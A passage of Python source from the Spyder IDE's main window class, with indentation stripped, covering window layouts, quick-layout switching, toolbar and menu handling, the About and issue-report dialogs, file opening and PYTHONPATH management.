settings = self.load_window_settings(prefix, default)
hexstate = settings[0]
self.first_spyder_run = False
if hexstate is None:
# First Spyder execution:
self.setWindowState(Qt.WindowMaximized)
self.first_spyder_run = True
self.setup_default_layouts('default', settings)
self.extconsole.setMinimumHeight(250)
# Now that the initial setup is done, copy the window settings,
# except for the hexstate in the quick layouts sections for the
# default layouts.
# Order and name of the default layouts is found in config.py
section = 'quick_layouts'
get_func = CONF.get_default if default else CONF.get
order = get_func(section, 'order')
# restore the original defaults if reset layouts is called
if default:
CONF.set(section, 'active', order)
CONF.set(section, 'order', order)
CONF.set(section, 'names', order)
for index, name, in enumerate(order):
prefix = 'layout_{0}/'.format(index)
self.save_current_window_settings(prefix, section)
CONF.set(section, prefix+'state', None)
# store the initial layout as the default in spyder
prefix = 'layout_default/'
section = 'quick_layouts'
self.save_current_window_settings(prefix, section)
self.current_quick_layout = 'default'
CONF.set(section, prefix+'state', None)
# Regenerate menu
self.quick_layout_set_menu()
self.set_window_settings(*settings)
for plugin in self.widgetlist:
try:
plugin.initialize_plugin_in_mainwindow_layout()
except Exception as error:
print("%s: %s" % (plugin, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
def setup_default_layouts(self, index, settings):
"""Setup default layouts when run for the first time"""
self.set_window_settings(*settings)
self.setUpdatesEnabled(False)
# IMPORTANT: order has to be the same as defined in the config file
MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(4)
# define widgets locally
editor = self.editor
console_ipy = self.ipyconsole
console_ext = self.extconsole
console_int = self.console
outline = self.outlineexplorer
explorer_project = self.projects
explorer_file = self.explorer
explorer_variable = self.variableexplorer
history = self.historylog
finder = self.findinfiles
help_plugin = self.help
helper = self.onlinehelp
plugins = self.thirdparty_plugins
global_hidden_widgets = [finder, console_int, explorer_project,
helper] + plugins
global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar,
self.search_toolbar]
# Layout definition
# layouts are organized by columns, each colum is organized by rows
# widths have to add 1.0, height per column have to add 1.0
# Spyder Default Initial Layout
s_layout = {'widgets': [
# column 0
[[explorer_project]],
# column 1
[[editor]],
# column 2
[[outline]],
# column 3
[[help_plugin, explorer_variable, helper, explorer_file,
finder] + plugins,
[console_int, console_ext, console_ipy, history]]
],
'width fraction': [0.0, # column 0 width
0.55, # column 1 width
0.0, # column 2 width
0.45], # column 3 width
'height fraction': [[1.0], # column 0, row heights
[1.0], # column 1, row heights
[1.0], # column 2, row heights
[0.46, 0.54]], # column 3, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
r_layout = {'widgets': [
# column 0
[[editor],
[console_ipy, console_ext, console_int]],
# column 1
[[explorer_variable, history, outline, finder] + plugins,
[explorer_file, explorer_project, help_plugin, helper]]
],
'width fraction': [0.55, # column 0 width
0.45], # column 1 width
'height fraction': [[0.55, 0.45], # column 0, row heights
[0.55, 0.45]], # column 1, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
# Matlab
m_layout = {'widgets': [
# column 0
[[explorer_file, explorer_project],
[outline]],
# column 1
[[editor],
[console_ipy, console_ext, console_int]],
# column 2
[[explorer_variable, finder] + plugins,
[history, help_plugin, helper]]
],
'width fraction': [0.20, # column 0 width
0.40, # column 1 width
0.40], # column 2 width
'height fraction': [[0.55, 0.45], # column 0, row heights
[0.55, 0.45], # column 1, row heights
[0.55, 0.45]], # column 2, row heights
'hidden widgets': [],
'hidden toolbars': [],
}
# Vertically split
v_layout = {'widgets': [
# column 0
[[editor],
[console_ipy, console_ext, console_int, explorer_file,
explorer_project, help_plugin, explorer_variable,
history, outline, finder, helper] + plugins]
],
'width fraction': [1.0], # column 0 width
'height fraction': [[0.55, 0.45]], # column 0, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
# Horizontally split
h_layout = {'widgets': [
# column 0
[[editor]],
# column 1
[[console_ipy, console_ext, console_int, explorer_file,
explorer_project, help_plugin, explorer_variable,
history, outline, finder, helper] + plugins]
],
'width fraction': [0.55, # column 0 width
0.45], # column 1 width
'height fraction': [[1.0], # column 0, row heights
[1.0]], # column 1, row heights
'hidden widgets': [outline],
'hidden toolbars': []
}
# Layout selection
layouts = {'default': s_layout,
RSTUDIO: r_layout,
MATLAB: m_layout,
VERTICAL: v_layout,
HORIZONTAL: h_layout}
layout = layouts[index]
widgets_layout = layout['widgets']
widgets = []
for column in widgets_layout :
for row in column:
for widget in row:
if widget is not None:
widgets.append(widget)
# Make every widget visible
for widget in widgets:
widget.toggle_view(True)
action = widget.toggle_view_action
action.setChecked(widget.dockwidget.isVisible())
# Set the widgets horizontally
for i in range(len(widgets) - 1):
first, second = widgets[i], widgets[i+1]
if first is not None and second is not None:
self.splitDockWidget(first.dockwidget, second.dockwidget,
Qt.Horizontal)
# Arrange rows vertically
for column in widgets_layout :
for i in range(len(column) - 1):
first_row, second_row = column[i], column[i+1]
if first_row is not None and second_row is not None:
self.splitDockWidget(first_row[0].dockwidget,
second_row[0].dockwidget,
Qt.Vertical)
# Tabify
for column in widgets_layout :
for row in column:
for i in range(len(row) - 1):
first, second = row[i], row[i+1]
if first is not None and second is not None:
self.tabify_plugins(first, second)
# Raise front widget per row
row[0].dockwidget.show()
row[0].dockwidget.raise_()
# Hide toolbars
hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars']
for toolbar in hidden_toolbars:
if toolbar is not None:
toolbar.close()
# Hide widgets
hidden_widgets = global_hidden_widgets + layout['hidden widgets']
for widget in hidden_widgets:
if widget is not None:
widget.dockwidget.close()
# set the width and height
self._layout_widget_info = []
width, height = self.window_size.width(), self.window_size.height()
# fix column width
# for c in range(len(widgets_layout)):
# widget = widgets_layout[c][0][0].dockwidget
# min_width, max_width = widget.minimumWidth(), widget.maximumWidth()
# info = {'widget': widget,
# 'min width': min_width,
# 'max width': max_width}
# self._layout_widget_info.append(info)
# new_width = int(layout['width fraction'][c] * width * 0.95)
# widget.setMinimumWidth(new_width)
# widget.setMaximumWidth(new_width)
# widget.updateGeometry()
# print(c, widgets_layout[c][0][0], new_width)
# fix column height
for c, column in enumerate(widgets_layout):
for r in range(len(column) - 1):
widget = column[r][0]
dockwidget = widget.dockwidget
dock_min_h = dockwidget.minimumHeight()
dock_max_h = dockwidget.maximumHeight()
info = {'widget': widget,
'dock min height': dock_min_h,
'dock max height': dock_max_h}
self._layout_widget_info.append(info)
# The 0.95 factor is to adjust height based on usefull
# estimated area in the window
new_height = int(layout['height fraction'][c][r]*height*0.95)
dockwidget.setMinimumHeight(new_height)
dockwidget.setMaximumHeight(new_height)
self._custom_layout_timer = QTimer(self)
self._custom_layout_timer.timeout.connect(self.layout_fix_timer)
self._custom_layout_timer.setSingleShot(True)
self._custom_layout_timer.start(5000)
def layout_fix_timer(self):
"""Fixes the height of docks after a new layout is set."""
info = self._layout_widget_info
for i in info:
dockwidget = i['widget'].dockwidget
if 'dock min width' in i:
dockwidget.setMinimumWidth(i['dock min width'])
dockwidget.setMaximumWidth(i['dock max width'])
if 'dock min height' in i:
dockwidget.setMinimumHeight(i['dock min height'])
dockwidget.setMaximumHeight(i['dock max height'])
dockwidget.updateGeometry()
self.setUpdatesEnabled(True)
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
self.quick_layout_switch(layout_index[new_index])
def quick_layout_set_menu(self):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
ql_actions = []
ql_actions = [create_action(self, _('Spyder Default Layout'),
triggered=lambda:
self.quick_layout_switch('default'))]
for name in order:
if name in active:
index = names.index(name)
# closure required so lambda works with the default parameter
def trigger(i=index, self=self):
return lambda: self.quick_layout_switch(i)
qli_act = create_action(self, name, triggered=trigger())
# closure above replaces the following which stopped working
# qli_act = create_action(self, name, triggered=lambda i=index:
# self.quick_layout_switch(i)
ql_actions += [qli_act]
self.ql_save = create_action(self, _("Save current layout"),
triggered=lambda:
self.quick_layout_save(),
context=Qt.ApplicationShortcut)
self.ql_preferences = create_action(self, _("Layout preferences"),
triggered=lambda:
self.quick_layout_settings(),
context=Qt.ApplicationShortcut)
self.ql_reset = create_action(self, _('Reset to spyder default'),
triggered=self.reset_window_layout)
self.register_shortcut(self.ql_save, "_", "Save current layout")
self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
ql_actions += [None]
ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
self.quick_layout_menu.clear()
add_actions(self.quick_layout_menu, ql_actions)
if len(order) == 0:
self.ql_preferences.setEnabled(False)
else:
self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
get = CONF.get
set_ = CONF.set
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
answer = QMessageBox.warning(self, _("Warning"),
_("Layout <b>%s</b> will be \
overwritten. Do you want to \
continue?") % name,
QMessageBox.Yes | QMessageBox.No)
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
# Always make active a new layout even if it overwrites an inactive
# layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
set_('quick_layouts', 'names', names)
set_('quick_layouts', 'order', order)
set_('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
get = CONF.get
set_ = CONF.set
section = 'quick_layouts'
names = get(section, 'names')
order = get(section, 'order')
active = get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
set_(section, 'names', dlg.names)
set_(section, 'order', dlg.order)
set_(section, 'active', dlg.active)
self.quick_layout_set_menu()
def quick_layout_switch(self, index):
"""Switch to quick layout number *index*"""
section = 'quick_layouts'
try:
settings = self.load_window_settings('layout_{}/'.format(index),
section=section)
(hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen) = settings
# The defaults layouts will alwyas be regenerated unless there was
# an overwrite, either by rewriting with same name, or by deleting
# and then creating a new one
if hexstate is None:
self.setup_default_layouts(index, settings)
except cp.NoOptionError:
QMessageBox.critical(self, _("Warning"),
_("Quick switch layout #%s has not yet "
"been defined.") % str(index))
return
# TODO: is there any real use in calling the previous layout
# setting?
# self.previous_layout_settings = self.get_window_settings()
self.set_window_settings(*settings)
self.current_quick_layout = index
# make sure the flags are correctly set for visible panes
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
# --- Show/Hide toolbars
def _update_show_toolbars_action(self):
"""Update the text displayed in the menu entry."""
if self.toolbars_visible:
text = _("Hide toolbars")
tip = _("Hide toolbars")
else:
text = _("Show toolbars")
tip = _("Show toolbars")
self.show_toolbars_action.setText(text)
self.show_toolbars_action.setToolTip(tip)
def save_visible_toolbars(self):
"""Saves the name of the visible toolbars in the .ini file."""
toolbars = []
for toolbar in self.visible_toolbars:
toolbars.append(toolbar.objectName())
CONF.set('main', 'last_visible_toolbars', toolbars)
def get_visible_toolbars(self):
"""Collects the visible toolbars."""
toolbars = []
for toolbar in self.toolbarslist:
if toolbar.toggleViewAction().isChecked():
toolbars.append(toolbar)
self.visible_toolbars = toolbars
def load_last_visible_toolbars(self):
"""Loads the last visible toolbars from the .ini file."""
toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[])
if toolbars_names:
dic = {}
for toolbar in self.toolbarslist:
dic[toolbar.objectName()] = toolbar
toolbars = []
for name in toolbars_names:
if name in dic:
toolbars.append(dic[name])
self.visible_toolbars = toolbars
else:
self.get_visible_toolbars()
self._update_show_toolbars_action()
@Slot()
def show_toolbars(self):
"""Show/Hides toolbars."""
value = not self.toolbars_visible
CONF.set('main', 'toolbars_visible', value)
if value:
self.save_visible_toolbars()
else:
self.get_visible_toolbars()
for toolbar in self.visible_toolbars:
toolbar.toggleViewAction().setChecked(value)
toolbar.setVisible(value)
self.toolbars_visible = value
self._update_show_toolbars_action()
# --- Other
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
# Now deal with Python shell and IPython plugins
shell = get_focus_python_shell()
if shell is not None:
# A Python shell widget has focus
self.last_console_plugin_focus_was_python = True
if self.help is not None:
# Help may be disabled in .spyder.ini
self.help.set_shell(shell)
from spyder.widgets.externalshell import pythonshell
if isinstance(shell, pythonshell.ExtPythonShellWidget):
shell = shell.parent()
self.variableexplorer.set_shellwidget_from_id(id(shell))
elif self.ipyconsole is not None:
focus_client = self.ipyconsole.get_focus_client()
if focus_client is not None:
self.last_console_plugin_focus_was_python = False
kwid = focus_client.kernel_widget_id
if kwid is not None:
idx = self.extconsole.get_shell_index_from_id(kwid)
if idx is not None:
kw = self.extconsole.shellwidgets[idx]
if self.help is not None:
self.help.set_shell(kw)
self.variableexplorer.set_shellwidget_from_id(kwid)
# Setting the kernel widget as current widget for the
# external console's tabwidget: this is necessary for
# the editor/console link to be working (otherwise,
# features like "Execute in current interpreter" will
# not work with IPython clients unless the associated
# IPython kernel has been selected in the external
# console... that's not brilliant, but it works for
# now: we shall take action on this later
self.extconsole.tabwidget.setCurrentWidget(kw)
focus_client.get_control().setFocus()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(element._shown_shortcut)
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(QKeySequence())
def update_edit_menu(self):
"""Update edit menu"""
if self.menuBar().hasFocus():
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
widget, textedit_properties = get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
#!!! Below this line, widget is expected to be a QPlainTextEdit instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if not console and not_readonly and not self.editor.is_file_opened():
return
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
if self.menuBar().hasFocus():
return
widget, textedit_properties = get_focus_widget_properties()
for action in self.editor.search_menu_actions:
action.setEnabled(self.editor.isAncestorOf(widget))
if textedit_properties is None: # widget is not an editor/console
return
#!!! Below this line, widget is expected to be a QPlainTextEdit instance
_x, _y, readwrite_editor = textedit_properties
# Disable the replace action for read-only files
self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
order = ['editor', 'console', 'ipython_console', 'variable_explorer',
'help', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console']
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if type(action) is str:
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def create_toolbars_menu(self):
order = ['file_toolbar', 'run_toolbar', 'debug_toolbar',
'main_toolbar', 'Global working directory', None,
'search_toolbar', 'edit_toolbar', 'source_toolbar']
for toolbar in self.toolbarslist:
action = toolbar.toggleViewAction()
name = toolbar.objectName()
try:
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
add_actions(self.toolbars_menu, order)
def createPopupMenu(self):
menu = QMenu('', self)
actions = self.help_menu_actions[:3] + \
[None, self.help_menu_actions[-1]]
add_actions(menu, actions)
return menu
def set_splash(self, message):
"""Set splash message"""
if message:
self.debug_print(message)
self.splash.show()
self.splash.showMessage(message, Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.white))
QApplication.processEvents()
def remove_tmpdir(self):
"""Remove Spyder temporary directory"""
shutil.rmtree(programs.TEMPDIR, ignore_errors=True)
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
for plugin in self.widgetlist:
if plugin.isAncestorOf(self.last_focused_widget):
plugin.visibility_changed(True)
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
prefix = 'window' + '/'
self.save_current_window_settings(prefix)
if CONF.get('main', 'single_instance'):
self.open_files_server.close()
for plugin in self.thirdparty_plugins:
if not plugin.closing_plugin(cancelable):
return False
for widget in self.widgetlist:
if not widget.closing_plugin(cancelable):
return False
self.dialog_manager.close_all()
if self.toolbars_visible:
self.save_visible_toolbars()
self.already_closed = True
return True
def add_dockwidget(self, child):
"""Add QDockWidget and toggleViewAction"""
dockwidget, location = child.create_dockwidget()
if CONF.get('main', 'vertical_dockwidget_titlebars'):
dockwidget.setFeatures(dockwidget.features()|
QDockWidget.DockWidgetVerticalTitleBar)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(child)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in self.widgetlist:
if plugin.isAncestorOf(widget):
plugin.dockwidget.hide()
break
def toggle_lock_dockwidgets(self, value):
"""Lock/Unlock dockwidgets"""
self.dockwidgets_locked = value
self.apply_panes_settings()
CONF.set('main', 'panes_locked', value)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
@Slot()
def maximize_dockwidget(self, restore=False):
"""Shortcut: Ctrl+Alt+Shift+M
First call: maximize current dockwidget
Second call (or restore=True): restore original window layout"""
if self.state_before_maximizing is None:
if restore:
return
# No plugin is currently maximized: maximizing focus plugin
self.state_before_maximizing = self.saveState()
focus_widget = QApplication.focusWidget()
for plugin in self.widgetlist:
plugin.dockwidget.hide()
if plugin.isAncestorOf(focus_widget):
self.last_plugin = plugin
self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
self.setCentralWidget(self.last_plugin)
self.last_plugin.ismaximized = True
# Workaround to solve an issue with editor's outline explorer:
# (otherwise the whole plugin is hidden and so is the outline explorer
# and the latter won't be refreshed if not visible)
self.last_plugin.show()
self.last_plugin.visibility_changed(True)
if self.last_plugin is self.editor:
# Automatically show the outline if the editor was maximized:
self.addDockWidget(Qt.RightDockWidgetArea,
self.outlineexplorer.dockwidget)
self.outlineexplorer.dockwidget.show()
else:
# Restore original layout (before maximizing current dockwidget)
self.last_plugin.dockwidget.setWidget(self.last_plugin)
self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
self.setCentralWidget(None)
self.last_plugin.ismaximized = False
self.restoreState(self.state_before_maximizing)
self.state_before_maximizing = None
self.last_plugin.get_focus_widget().setFocus()
self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.isFullScreen():
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = get_icon(icon)
self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
if self.isFullScreen():
self.fullscreen_flag = False
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
@Slot()
def about(self):
"""About Spyder"""
versions = get_versions()
# Show Mercurial revision for development version
revlink = ''
if versions['revision']:
rev = versions['revision']
revlink = " (<a href='https://github.com/spyder-ide/spyder/"\
"commit/%s'>Commit: %s</a>)" % (rev, rev)
QMessageBox.about(self,
_("About %s") % "Spyder",
"""<b>Spyder %s</b> %s
<br>The Scientific PYthon Development EnviRonment
<br>Copyright © The Spyder Project Contributors
<br>Licensed under the terms of the MIT License
<p>Created by Pierre Raybaut
<br>Developed and maintained by the
<a href="%s/blob/master/AUTHORS">Spyder Project Contributors</a>
<br>Many thanks to all the Spyder beta-testers and regular users.
<p>Most of the icons come from the Crystal Project
(© 2006-2007 Everaldo Coelho). Other icons by
<a href="http://p.yusukekamiyamane.com/"> Yusuke Kamiyamane</a>
(all rights reserved) and by
<a href="http://www.oxygen-icons.org/">
The Oxygen icon theme</a>.
<p>For bug reports and feature requests, please go
to our <a href="%s">Github website</a>. For discussions around the
project, please go to our <a href="%s">Google Group</a>
<p>This project is part of a larger effort to promote and
facilitate the use of Python for scientific and engineering
software development. The popular Python distributions
<a href="http://continuum.io/downloads">Anaconda</a>,
<a href="https://winpython.github.io/">WinPython</a> and
<a href="http://code.google.com/p/pythonxy/">Python(x,y)</a>
also contribute to this plan.
<p>Python %s %dbits, Qt %s, %s %s on %s"""
% (versions['spyder'], revlink, __project_url__,
__project_url__, __forum_url__, versions['python'],
versions['bitness'], versions['qt'], versions['qt_api'],
versions['qt_api_ver'], versions['system']))
@Slot()
def show_dependencies(self):
"""Show Spyder's Dependencies dialog box"""
from spyder.widgets.dependencies import DependenciesDialog
dlg = DependenciesDialog(None)
dlg.set_data(dependencies.DEPENDENCIES)
dlg.show()
dlg.exec_()
@Slot()
def report_issue(self):
if PY3:
from urllib.parse import quote
else:
from urllib import quote # analysis:ignore
versions = get_versions()
# Get git revision for development version
revision = ''
if versions['revision']:
revision = versions['revision']
issue_template = """\
## Description
**What steps will reproduce the problem?**
1.
2.
3.
**What is the expected output? What do you see instead?**
**Please provide any additional information below**
## Version and main components
* Spyder Version: %s %s
* Python Version: %s
* Qt Versions: %s, %s %s on %s
## Dependencies
```
%s
```
""" % (versions['spyder'],
revision,
versions['python'],
versions['qt'],
versions['qt_api'],
versions['qt_api_ver'],
versions['system'],
dependencies.status())
url = QUrl("https://github.com/spyder-ide/spyder/issues/new")
if PYQT5:
from qtpy.QtCore import QUrlQuery
query = QUrlQuery()
query.addQueryItem("body", quote(issue_template))
url.setQuery(query)
else:
url.addEncodedQueryItem("body", quote(issue_template))
QDesktopServices.openUrl(url)
@Slot()
def google_group(self):
url = QUrl("http://groups.google.com/group/spyderlib")
QDesktopServices.openUrl(url)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.widgets.editor import TextEditBaseWidget
if isinstance(widget, TextEditBaseWidget):
getattr(widget, callback)()
def redirect_internalshell_stdio(self, state):
if state:
self.console.shell.interpreter.redirect_stds()
else:
self.console.shell.interpreter.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
programs.run_python_script_in_terminal(fname, wdir, args,
interact, debug, python_args)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
else:
self.extconsole.visibility_changed(True)
self.extconsole.raise_()
self.extconsole.start(
fname=to_text_string(fname), wdir=to_text_string(wdir),
args=to_text_string(args), interact=interact,
debug=debug, python=python, post_mortem=post_mortem,
python_args=to_text_string(python_args) )
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in external or IPython console and eventually set focus
to the editor
"""
console = self.extconsole
if self.ipyconsole is None or self.last_console_plugin_focus_was_python:
console = self.extconsole
else:
console = self.ipyconsole
console.visibility_changed(True)
console.raise_()
console.execute_python_code(lines)
if focus_to_editor:
self.editor.visibility_changed(True)
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif encoding.is_text_file(fname):
self.editor.load(fname)
elif not external:
fname = file_uri(fname)
programs.start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
fname = encoding.to_unicode_from_fs(fname)
if osp.isfile(fname):
self.open_file(fname, external=True)
elif osp.isfile(osp.join(CWD, fname)):
self.open_file(osp.join(CWD, fname), external=True)
#---- PYTHONPATH management, etc.
def get_spyder_pythonpath(self):
"""Return Spyder PYTHONPATH"""
return self.path+self.project_path
def add_path_to_sys_path(self):
"""Add Spyder path to sys.path"""
for path in reversed(self.get_spyder_pythonpath()):
sys.path.insert(1, path)
def remove_path_from_sys_path(self):
"""Remove Spyder path from sys.path"""
sys_path = sys.path
while sys_path[1] in self.get_spyder_pythonpath():
sys_path.pop(1)
@Slot()
def path_manager_callback(self):
"""Spyder path manager"""
from spyder.widgets.pathmanager import PathManager
self.remove_path_from_sys_path()
project_path = self.projects.get_pythonpath()
dialog = PathManager(self, self.path, project_path, sync=True)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.exec_()
self.add_path_to_sys_path()
encoding.writelines(self.path, self.SPYDER_PATH) # Saving path
self.sig_pythonpath_changed.emit()
def pythonpath_changed(self):
"""Projects PYTHONPATH contribution has changed"""
self.remove_path_from_sys_path()
self.project_path = self.projects.get_pythonpath()
self.add_path_to_sys_path()
self.sig_pythonpath_changed.emit()
@Slot()
def win_env(self):
"""Show Windows current user environment variables"""
self.dialog_manager.show(WinUserEnvDialog(self))
#---- Preferences
def apply_settings(self):
"""Apply settings changed in 'Preferences' dialog box"""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes Issue 2036
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
else:
qapp.setStyle(CONF.get('main', 'windows_style',
self.default_style))
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
if CONF.get('main', 'animated_docks'):
default = default|QMainWindow.AnimatedDocks
self.setDockOptions(default)
self.apply_panes_settings()
self.apply_statusbar_settings()
def apply_panes_settings(self):
"""Update dockwidgets features settings"""
# Update toggle action on menu
for child in self.widgetlist:
features = child.FEATURES
if CONF.get('main', 'vertical_dockwidget_titlebars'):
features = features | QDockWidget.DockWidgetVerticalTitleBar
if not self.dockwidgets_locked:
features = features | QDockWidget.DockWidgetMovable
child.dockwidget.setFeatures(features)
child.update_margins()
def apply_statusbar_settings(self):
"""Update status bar widgets settings"""
show_status_bar = CONF.get('main', 'show_status_bar')
self.statusBar().setVisible(show_status_bar)
if show_status_bar:
for widget, name in ((self.mem_status, 'memory_usage'),
(self.cpu_status, 'cpu_usage')):
if widget is not None:
widget.setVisible(CONF.get('main', '%s/enable' % name))
widget.set_interval(CONF.get('main', '%s/timeout' % name))
else:
return
@Slot()
def edit_preferences(self):
"""Edit Spyder preferences"""
from spyder.plugins.configdialog import ConfigDialog
dlg = ConfigDialog(self)
dlg.size_change.connect(self.set_prefs_size)
if self.prefs_dialog_size is not None:
dlg.resize(self.prefs_dialog_size)
for PrefPageClass in self.general_prefs:
widget = PrefPageClass(dlg, main=self)
widget.initialize()
dlg.add_page(widget)
for plugin in [self.workingdirectory, self.editor,
self.projects, self.extconsole, self.ipyconsole,
self.historylog, self.help, self.variableexplorer,
self.onlinehelp, self.explorer, self.findinfiles
]+self.thirdparty_plugins:
if plugin is not None:
try:
